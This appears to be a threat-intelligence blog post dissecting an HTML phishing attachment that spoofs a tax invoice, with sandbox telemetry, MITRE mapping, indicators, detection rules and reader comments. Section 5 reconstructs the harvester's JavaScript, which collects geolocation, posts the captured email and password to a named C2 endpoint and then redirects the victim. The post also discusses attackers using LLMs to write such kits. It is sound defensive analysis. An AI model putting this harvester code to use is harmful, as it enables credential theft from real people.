KL3FT3Z

Posted on May 1

Anatomy of a Low-Detection Credential Phishing Campaign

#webdev #ai #security #cybersecurity

description: "Deep-dive reverse engineering analysis of a sophisticated HTML-based credential harvester spoofing a corporate domain with only 1/26 AV detection."

⚠️ Threat Level: HIGH | Detection Rate: ~4% (1/26) | Type: Credential Harvester + Geo-IP Exfiltration

Executive Summary

On April 29, 2026, a targeted phishing email arrived, purportedly from accnt@hackteam.red, a spoofed sender address on the recipient's own domain. The attachment, named Tax Invoice PDF.SHTML, is an obfuscated HTML file masquerading as a PDF document. When opened in a browser, it harvests email credentials and geolocation data and exfiltrates them to a command-and-control (C2) server. Only 1 of 26 antivirus engines flagged it.

This article provides a full technical teardown of the sample, its behavioral indicators, network infrastructure, and defensive recommendations.

1. Attack Chain Overview

[Email Delivery] → [Social Engineering] → [HTML Execution] → [Credential Harvesting] → [Geo-IP Collection] → [C2 Exfiltration] → [Delayed Redirect]

Stage	Description
Delivery	Spearphishing email with `.SHTML` attachment
Pretext	"Tax invoice due for payment" — urgency-based social engineering
Execution	User opens file → browser renders fake login page
Harvesting	Form captures email + password
Reconnaissance	`ip-api.com` lookup for geolocation enrichment
Exfiltration	POST to `premiumpriests4owo.site/report.php`
Evasion	Redirect to Google static image to mask compromise

2. Sample Metadata

Filename:        Tax Invoice PDF.SHTML
Size:            18 KiB
MIME Type:       text/html
SHA256:          15383c1b855341a0bc4975f2f3ed299bc6abf13a3e6e48b05ca3371dd7068dfc
AV Detection:    1/26 (~4%); Avira: PHISH/HTML.Agent.ENJ
Entropy:         5.42 (elevated; consistent with script obfuscation)
First Seen:      2026-05-01 07:57:37 UTC

Why the Low Detection Rate?

Traditional AV engines excel at signature-based detection of binary malware (PE files, DLLs). This sample is pure HTML + JavaScript: it drops no executable and runs entirely inside the browser sandbox, which is why such attachments are loosely called "fileless". Without a malicious binary payload, most static scanners return clean results. An entropy of 5.42 (on the usual 0 to 8 bits-per-byte scale) is elevated for hand-written HTML and consistent with obfuscated or encoded JavaScript, but it does not prove obfuscation on its own, and entropy alone is rarely sufficient for detection without behavioral analysis.
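To make the entropy figure concrete, here is a minimal sketch of how a byte-level Shannon entropy can be computed. It assumes the sandbox reports entropy in bits per byte, which the report does not state explicitly; the function name is illustrative.

```python
import math
from collections import Counter


def shannon_entropy(data: bytes) -> float:
    """Return the Shannon entropy of data in bits per byte (0.0 to 8.0)."""
    if not data:
        return 0.0
    total = len(data)
    counts = Counter(data)  # frequency of each byte value
    return -sum((n / total) * math.log2(n / total) for n in counts.values())
```

Reading the attachment in binary mode and passing its bytes to `shannon_entropy` gives a value comparable to the one in the metadata block. Treat it as one triage signal among several, since minified but benign JavaScript can score in a similar range.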

AI-Assisted Threat Generation: A New Paradigm

The source code of this phishing kit reveals a disturbing evolution in cybercrime tooling: the hybrid human-AI attack model. While the malicious intent is unmistakably human, the implementation carries distinct fingerprints of large language model (LLM) assistance.

Hallmarks of LLM-Generated Code

1. Prompt Leakage in Comments

The JavaScript contains comments that appear to be direct echoes of the operator's prompts:

// Instead of Telegram, form data + location + attempt counter are sent as standard POST 
// (x-www-form-urlencoded) to a PHP server endpoint.
// All CSS and functionality remain identical.

The phrase "All CSS and functionality remain identical" is characteristic of prompt engineering residue — instructions given to the LLM that were preserved verbatim in the output rather than being interpreted as meta-directives.

2. Structural Comment Patterns

The code is organized with GPT-style section separators:

// ---------- PHP ENDPOINT CONFIGURATION ----------
// ---------- PRESERVE ALL ORIGINAL VARIABLES & LOGIC ----------

This ALL-CAPS header pattern with ASCII dividers is common in ChatGPT/Claude code output, where the model uses visual structure to organize complex refactors. Human developers write such dividers too, so the pattern is suggestive rather than conclusive on its own.

3. Over-Engineered Abstractions

For a simple credential exfiltration task, the code implements unnecessarily complex patterns:

function sendToPhpServer(...) {
    return new Promise((resolve, reject) => {
        const xhr = new XMLHttpRequest();
        xhr.onload = function() { resolve(); };
        xhr.onerror = function() { resolve(); }; // Silent failure
    });
}

The Promise wrapper around an asynchronous, callback-based XHR, combined with calling resolve() even on error, reflects the LLM's training bias toward "safe" code that doesn't break, even when failure should be noisy.

4. Defensive Coding Without Purpose

The LLM inserted explanatory justifications for obvious choices:

// Set content type to standard form encoding (NOT JSON)

This self-justifying comment is typical of AI outputs trained to explain reasoning, even when the reasoning is trivial.

Human Operator Fingerprints

Despite AI assistance, the operator left unmistakably human traces:

Artifact	Evidence	Significance
Yoruba variable names	`oruko` (name), `kokoro` (key, used here for the password)	Suggests West African operator origin — consistent with known BEC clusters
Typographic errors	`"Securty serices"` in footer	LLMs rarely misspell visible UI text; human copy-paste or manual editing
C2 hardcoding	Plaintext endpoint in source	Human operational decision, not AI-generated
Logic quirks	`countAttempt >= 2` before redirect	Crude human-implemented anti-analysis/delay tactic

The Democratization Threat

This sample illustrates a critical inflection point: AI has lowered the technical barrier for cybercrime to near zero. The operator did not need to understand JavaScript closures, CORS policies, or XHR internals — only how to phrase a prompt. Yet the resulting code is sufficiently obfuscated (entropy 5.42), sufficiently functional (active C2 exfiltration), and sufficiently evasive (1/26 AV detection) to pose a real threat.

Key Insight: The future of phishing is not skilled coders writing malware. It is unskilled operators directing skilled AI, with human expertise reserved only for infrastructure (domains, hosting, mule accounts) and social engineering (pretexting, target selection).

Defensive Implications

Traditional Assumption	New Reality
Poor grammar = amateur threat	AI generates flawless copy; errors may be intentional or human-overridden
Complex code = sophisticated actor	AI produces complex code; sophistication is in the prompt, not the operator
Static signatures work	AI-generated variants have high structural diversity, low signature stability
Code analysis reveals author skill	Hybrid code requires attribution triage: separate AI artifacts from human fingerprints

For defenders, this means shifting from code-centric detection to behavior-centric detection: the C2 domain, the exfiltration pattern, and the social engineering pretext remain human-controlled and detectable, even when the implementation is AI-generated.

3. Email Analysis

Headers & Social Engineering

From:    Account <accnt@hackteam.red>
To:      b0x@hackteam.red
Date:    29 Apr 2026, 21:29 UTC
Subject: [Implied] Tax Invoice

Key Psychological Triggers:

Domain spoofing: the sender address uses the recipient's own domain (hackteam.red), so the message appears to come from inside the organization
Authority impersonation: Sender name "Account" implies financial department
Urgency: "due for payment at the end of this month"
Curiosity gap: "Use your email password to access the Tax document" — this is the critical red flag; no legitimate PDF requires an email password

4. Behavioral Analysis (Sandbox Telemetry)

Analysis performed via Hybrid Analysis Falcon Sandbox. The sample triggered 29 indicators mapped to 21 MITRE ATT&CK techniques across 8 tactics.

4.1 Process Execution

# Primary execution
msedge.exe -- "file:///C:/TaxInvoicePDF.SHTML.html"

# Child processes spawned (standard Edge browser behavior)
msedge.exe --type=renderer
msedge.exe --type=gpu-process
msedge.exe --type=utility --utility-sub-type=network.mojom.NetworkService
identity_helper.exe --type=utility

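Note: The file opens directly in the browser via the file:// protocol, so no external server is required to render the fake login page. This makes it highly portable. On an isolated or air-gapped host the page still renders, but the geo-IP lookup and the exfiltration POST fail without network access.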

4.2 Network Indicators

Domain / IP	Purpose	Risk
`ip-api.com`	Geo-IP lookup (country, region, city, ISP, IP)	Reconnaissance
`premiumpriests4owo.site`	C2 server — credential exfiltration	MALICIOUS
`i.imgur.com/6lOn9d7.png`	Likely decoy image / branding asset	Legitimate abused
`encrypted-tbn0.gstatic.com`	Post-exfiltration redirect destination	Legitimate abused

4.3 MITRE ATT&CK Mapping

Technique	ID	Context
Spearphishing Attachment	T1566.001	Email with `.SHTML` attachment
User Execution: Malicious File	T1204.002	User opens the attachment; browser renders malicious HTML
System Location Discovery	T1614	`ip-api.com` JSON query
Exfiltration Over C2 Channel	T1041	POST to `report.php`
Obfuscated Files or Information	T1027	High entropy JS (5.42)
Input Capture	T1056	Password field harvesting
Application Layer Protocol	T1071.001	HTTP/HTTPS C2 communication
Data Encoding	T1132.001	Base64 artifacts in requests

5. Reverse Engineering: Script Deconstruction

Based on sandbox memory extraction and pattern matching, the embedded JavaScript follows this logical flow:

// ============================================
// Phase 1: Geolocation Reconnaissance
// ============================================
fetch('http://ip-api.com/json/?fields=status,message,country,regionName,city,isp,query')
  .then(response => response.json())
  .then(geoData => {
    if (geoData.status === 'success') {
      locationData = {
        country: geoData.country || 'Unknown',
        state: geoData.regionName || 'Unknown',
        city: geoData.city || 'Unknown',
        isp: geoData.isp || 'Unknown',
        ip: geoData.query || 'Unknown'
      };
    }
  });

// ============================================
// Phase 2: Credential Harvesting Form
// ============================================
/*
  Rendered HTML structure (inferred):
  <form method="post" id="authForm">
    <input type="email" placeholder="email" name="oruko">
    <input type="password" placeholder="Enter password" name="...">
    <button type="submit">Access Document</button>
  </form>
  <div id="errorMsg">Invalid credentials</div>
*/

document.getElementById('authForm').addEventListener('submit', function(e) {
  e.preventDefault(); // Prevent actual form submission

  const formEmail = document.querySelector('[name="oruko"]').value;
  const formPassword = document.querySelector('[type="password"]').value;

  // ============================================
  // Phase 3: Data Exfiltration
  // ============================================
  const xhr = new XMLHttpRequest();
  const PHP_ENDPOINT = 'https://premiumpriests4owo.site/report.php';

  xhr.open('POST', PHP_ENDPOINT, true);
  xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');

  const params = new URLSearchParams();
  params.append('oruko', formEmail);      // "oruko" = Yoruba for "name"
  params.append('...', formPassword);    // [obfuscated key]
  params.append('geo', JSON.stringify(locationData));

  xhr.send(params.toString());

  // ============================================
  // Phase 4: Evasion — Delayed Redirect
  // ============================================
  setTimeout(() => {
    window.location.href = 'https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQaUwWuDNV0h2gvKH5z1fKZ2B05YVGNhfKgCg&s';
  }, 2000); // 2-second delay to mask data transmission
});

Notable Obfuscation Techniques

High Entropy Strings: Character sequences like y."sZ"( and J+zX suggest Base64 or custom encoding layers
Legitimate Service Abuse: Using ip-api.com (free geo-IP API) and i.imgur.com (image hosting) blends malicious traffic with benign patterns
Variable Naming: The use of oruko (Yoruba language) may indicate operator origin or intentional anti-analysis confusion
Delayed Redirect: The setTimeout redirect to a Google static image creates a plausible "loading" experience while data transmits in background
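The combination of a password field and a geo-IP lookup described above can be checked statically once the markup is de-obfuscated. The following is a minimal sketch using only the Python standard library; the host list and the function name `triage_html` are assumptions for illustration, and it will miss forms that are built at runtime by obfuscated script.

```python
import re
from html.parser import HTMLParser

# Assumed list of geo-IP lookup hosts; extend for your environment.
GEO_IP_HOSTS = ("ip-api.com", "ipapi.co", "ipinfo.io")
URL_RE = re.compile(r"https?://([a-z0-9.-]+)", re.IGNORECASE)


class _PasswordFieldFinder(HTMLParser):
    """Records whether any <input type="password"> appears in the markup."""

    def __init__(self):
        super().__init__()
        self.has_password_input = False

    def handle_starttag(self, tag, attrs):
        if tag == "input" and (dict(attrs).get("type") or "").lower() == "password":
            self.has_password_input = True


def _is_geo_host(host: str) -> bool:
    return any(host == g or host.endswith("." + g) for g in GEO_IP_HOSTS)


def triage_html(text: str) -> dict:
    """Summarize static indicators found in an HTML document."""
    finder = _PasswordFieldFinder()
    finder.feed(text)
    hosts = {h.lower() for h in URL_RE.findall(text)}
    geo_hosts = sorted(h for h in hosts if _is_geo_host(h))
    return {
        "password_input": finder.has_password_input,
        "geo_ip_hosts": geo_hosts,
        "external_hosts": sorted(hosts),
        "suspicious": finder.has_password_input and bool(geo_hosts),
    }
```

Running it on the DOM dumped by a sandbox, rather than on the raw attachment, is likely to give better coverage because the rendered structure is visible there.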

6. Infrastructure Analysis

C2 Domain: `premiumpriests4owo.site`

TLD: .site — commonly abused for cheap, disposable infrastructure
Naming convention: Dictionary words plus a short suffix (4owo); this resembles throwaway or algorithmically generated names, though one sample is not enough to confirm a DGA
Endpoint: /report.php — standard PHP data collection script
Protocol: HTTPS (TLS 1.2) — encrypts exfiltration in transit

Abuse of Legitimate Services

Service	Abuse Vector	Detection Evasion
`ip-api.com`	Free geolocation API	No malicious infrastructure needed
`i.imgur.com`	Image hosting for decoy assets	Trusted domain in corporate allowlists
`googleapis.com`	Chrome Web Store verification (legitimate Edge behavior)	Blends with normal browser traffic

7. Detection & Defensive Strategies

7.1 Network-Level Detection

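# Suricata signatures (HTTP rules need cleartext or TLS-inspected traffic)
# The geo-IP lookup and the credential POST are separate requests, so each
# gets its own rule. The domain is matched in the Host header, not the URI.
alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"PHISHING HTML Credential Harvester - ip-api.com geo-IP lookup"; \
    flow:established,to_server; \
    content:"ip-api.com"; http_host; \
    content:"/json"; http_uri; \
    classtype:trojan-activity; \
    sid:1000001; rev:2;)

alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"SUSPICIOUS POST to .site domain with credential data"; \
    flow:established,to_server; \
    content:"POST"; http_method; \
    content:".site"; http_host; \
    pcre:"/(password|passwd|pwd|email|oruko)=/Pi"; \
    classtype:trojan-activity; \
    sid:1000002; rev:2;)

# The C2 endpoint uses HTTPS, so without TLS inspection match on the SNI instead.
alert tls $HOME_NET any -> $EXTERNAL_NET any (msg:"PHISHING TLS SNI for C2 premiumpriests4owo.site"; \
    flow:established,to_server; \
    tls.sni; content:"premiumpriests4owo.site"; \
    classtype:trojan-activity; \
    sid:1000003; rev:1;)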
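The body-matching idea in the second signature can also be applied offline, for example to request bodies exported from a proxy or a TLS-inspecting gateway. Below is a minimal sketch; the key list mirrors the signature's pattern, the function name is hypothetical, and unlike the regular expression it matches whole field names rather than substrings.

```python
from urllib.parse import parse_qs

# Field names from the signature's pattern, including "oruko" from the sample.
CREDENTIAL_KEYS = {"password", "passwd", "pwd", "email", "oruko"}


def credential_fields(body: str) -> set:
    """Return credential-like field names found in a urlencoded POST body."""
    fields = parse_qs(body, keep_blank_values=True)
    return {name for name in fields if name.lower() in CREDENTIAL_KEYS}
```

A non-empty result on a POST to a newly registered or low-reputation domain is a reasonable trigger for manual review.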

7.2 Email Security Policies

Policy	Implementation
Attachment Blocking	Quarantine `.shtml`, `.html`, `.htm` attachments from external senders
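Misleading Extension Detection	Flag attachments whose name contains "PDF" but whose real extension is not `.pdf` (e.g. `Tax Invoice PDF.SHTML`), as well as true double extensions such as `.pdf.html`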
DMARC Enforcement	`p=reject` for `hackteam.red` to prevent spoofing
User Training	"No PDF requires your email password" — golden rule
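The attachment policies above can be approximated with a filename check at the mail gateway. This is a minimal sketch, not a complete policy: the extension and lure-token lists are assumptions, and the function name is hypothetical. It flags HTML-type attachments whose name advertises a different document type.

```python
from pathlib import PurePath

# Extensions a browser renders as HTML (assumed list; adjust per policy).
HTML_EXTENSIONS = {".shtml", ".html", ".htm", ".xhtml"}
# Document types commonly named in lures (assumed list).
LURE_TOKENS = ("pdf", "doc", "docx", "xls", "xlsx")


def is_suspicious_attachment(filename: str) -> bool:
    """True if an HTML-type attachment's name advertises another document type."""
    path = PurePath(filename)
    if path.suffix.lower() not in HTML_EXTENSIONS:
        return False
    # Split the stem on common separators so "PDF" is matched as a whole word.
    stem = path.stem.lower()
    for sep in (".", "_", "-"):
        stem = stem.replace(sep, " ")
    words = stem.split()
    return any(token in words for token in LURE_TOKENS)
```

The sample's name, `Tax Invoice PDF.SHTML`, is flagged because its real extension is `.SHTML` while the stem contains the word "PDF". A blanket quarantine of HTML attachments from external senders is stricter and simpler where the business can tolerate it.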

7.3 Endpoint Detection (EDR/XDR)

# Behavioral Indicator (correlate process and network telemetry)
Process: msedge.exe | chrome.exe | firefox.exe
CommandLine contains: "file:///" AND (".html" OR ".htm" OR ".shtml")
Network (same host, shortly after launch): request to "ip-api.com" OR "ipapi.co"
Action: Alert + Isolate

# File System Indicator
FileWrite: *.SHTML, *.HTML with entropy > 5.0 AND (content contains "password" OR content contains 'type="password"')
Action: Quarantine + Hash submission
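The behavioral indicator depends on joining two telemetry sources, because the geo-IP host shows up in network events rather than on the browser's command line. The following is a minimal sketch of that correlation; the event classes, field names, and the 30-second window are assumptions, not any EDR product's schema.

```python
from dataclasses import dataclass
from datetime import datetime, timedelta

BROWSERS = {"msedge.exe", "chrome.exe", "firefox.exe"}
GEO_IP_HOSTS = {"ip-api.com", "ipapi.co"}
HTML_MARKERS = (".html", ".htm", ".shtml")


@dataclass
class ProcessEvent:
    time: datetime
    host: str          # endpoint name
    image: str         # process image name
    command_line: str


@dataclass
class DnsEvent:
    time: datetime
    host: str          # endpoint name
    query: str         # domain that was resolved


def opened_local_html(ev: ProcessEvent) -> bool:
    """True if a browser was launched on a local HTML file."""
    cmd = ev.command_line.lower()
    return (
        ev.image.lower() in BROWSERS
        and "file:///" in cmd
        and any(marker in cmd for marker in HTML_MARKERS)
    )


def correlate(procs, dns, window=timedelta(seconds=30)):
    """Pair local-HTML browser launches with geo-IP lookups on the same host."""
    alerts = []
    for p in procs:
        if not opened_local_html(p):
            continue
        for d in dns:
            in_window = timedelta(0) <= d.time - p.time <= window
            if d.host == p.host and in_window and d.query.lower() in GEO_IP_HOSTS:
                alerts.append((p, d))
    return alerts
```

Events are matched by endpoint and time rather than by process ID, since Chromium-based browsers issue network requests from a separate network service process.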

7.4 YARA Rule

rule HTML_Credential_Harvester_Generic {
    meta:
        description = "Detects HTML-based credential phishing with geo-IP and exfiltration"
        author = "ThreatIntel Analyst"
        date = "2026-05-01"
        hash = "15383c1b855341a0bc4975f2f3ed299bc6abf13a3e6e48b05ca3371dd7068dfc"
    strings:
        $geo1 = "ip-api.com" ascii wide
        $geo2 = "ipapi.co" ascii wide
        $form1 = "type=\"password\"" ascii wide
        $form2 = "placeholder=\"Enter password\"" ascii wide
        $exfil1 = "XMLHttpRequest" ascii wide
        $exfil2 = "URLSearchParams" ascii wide
        $exfil3 = "application/x-www-form-urlencoded" ascii wide
        $redirect1 = "setTimeout" ascii wide
        $redirect2 = "window.location.href" ascii wide
    condition:
        filesize < 50KB and
        (uint16be(0) == 0x3c21 or uint16be(0) == 0x3c68) and // file starts with "<!" or "<h"
        1 of ($geo*) and
        1 of ($form*) and
        1 of ($exfil*) and
        1 of ($redirect*)
}

8. IOC Summary

Type	Indicator	Confidence
File Hash	`15383c1b855341a0bc4975f2f3ed299bc6abf13a3e6e48b05ca3371dd7068dfc`	Confirmed
C2 Domain	`premiumpriests4owo.site`	Malicious
C2 URL	`https://premiumpriests4owo.site/report.php`	Malicious
Geo-IP API	`http://ip-api.com/json/`	Abused
Decoy Image	`https://i.imgur.com/6lOn9d7.png`	Abused
Redirect Target	`https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQaUwWuDNV0h2gvKH5z1fKZ2B05YVGNhfKgCg&s`	Abused
Sender	`accnt@hackteam.red`	Spoofed
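For retro-hunting, the indicators in this table can be matched against proxy or DNS logs. Here is a minimal sketch that separates the confirmed C2 domain from abused legitimate services, which are better treated as context than as block rules. The set names, labels, and function name are illustrative assumptions.

```python
from urllib.parse import urlsplit

# Confirmed malicious infrastructure from the IOC table.
MALICIOUS_DOMAINS = {"premiumpriests4owo.site"}
# Legitimate services abused by the sample: context only, not block rules.
CONTEXT_DOMAINS = {"ip-api.com"}
CONTEXT_URLS = {"https://i.imgur.com/6lOn9d7.png"}


def _matches(host: str, domains: set) -> bool:
    return any(host == d or host.endswith("." + d) for d in domains)


def classify_url(url: str) -> str:
    """Classify a full URL (with scheme) as malicious, context, or unlisted."""
    host = (urlsplit(url).hostname or "").lower()
    if _matches(host, MALICIOUS_DOMAINS):
        return "malicious"
    if url in CONTEXT_URLS or _matches(host, CONTEXT_DOMAINS):
        return "context"
    return "unlisted"
```

A "context" hit alone is weak evidence, but the same endpoint producing a "context" hit followed by a "malicious" hit matches the attack chain described in this article.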

9. Lessons Learned

Fileless threats bypass traditional AV: HTML/JS phishing requires behavioral analysis, not just signatures
Legitimate services are weaponized: ip-api.com, i.imgur.com, and gstatic.com provide cover for malicious activity
Extension tricks still work: the "PDF" in Tax Invoice PDF.SHTML exploits user trust in PDFs, while the real .SHTML extension makes the browser render HTML
Low detection ≠ low risk: a 1/26 detection rate reflects how well the kit evades static scanning, not how harmless it is; the threat is real and active
User awareness is the last line of defense: Technical controls failed; the user who questions "Why does a PDF need my password?" stops the chain

10. References

Analysis conducted May 1, 2026. Indicators are shared for defensive purposes. If you encounter similar samples, submit to your threat intelligence platform and update detection rules.

Stay vigilant. Trust but verify.

Top comments (2)

Rahul S • May 2

The ip-api.com call is an underappreciated detection signal imo. Legitimate email attachments don't phone home to geolocation APIs, so any HTML rendered in a sandbox that makes an outbound request to ip-api.com, ipinfo.io, or similar services is worth flagging immediately — that's a stronger indicator than trying to pattern-match the credential form itself. The other thing worth noting is what happens after the harvest. These credentials don't sit in a database — they get fed into automated stuffing tools within hours, and the login attempts come from completely different infrastructure than where the victim was phished. The victim opens the attachment in Chicago, but the stuffing attempt hits the target's login endpoint from a VPS in Frankfurt or a residential proxy in São Paulo. If your auth layer checks the requesting IP's context at login time — is it a datacenter range, a known hosting provider, a proxy service — you catch the downstream replay even if the phishing itself was invisible to you. You can test what that looks like at ipasis.com/scan with any suspicious IP.

KL3FT3Z • May 2

Great points. On the behavioral signal: we specifically chose to highlight pattern-matching in the article because that's what most EDRs do by default, but you're right that it's fundamentally fragile. The ip-api.com call is deterministic — it happens 100% of the time, regardless of obfuscation, because the operator needs geolocation for victim triage (prioritizing corporate IPs, filtering sandbox environments). On the stuffing side: have you observed operators using residential proxies with matching geolocation to bypass basic geo-fencing? We've seen cases where the stuffing IP matches the victim's city/ISP to evade «impossible travel» checks, which makes IP-context analysis even more critical.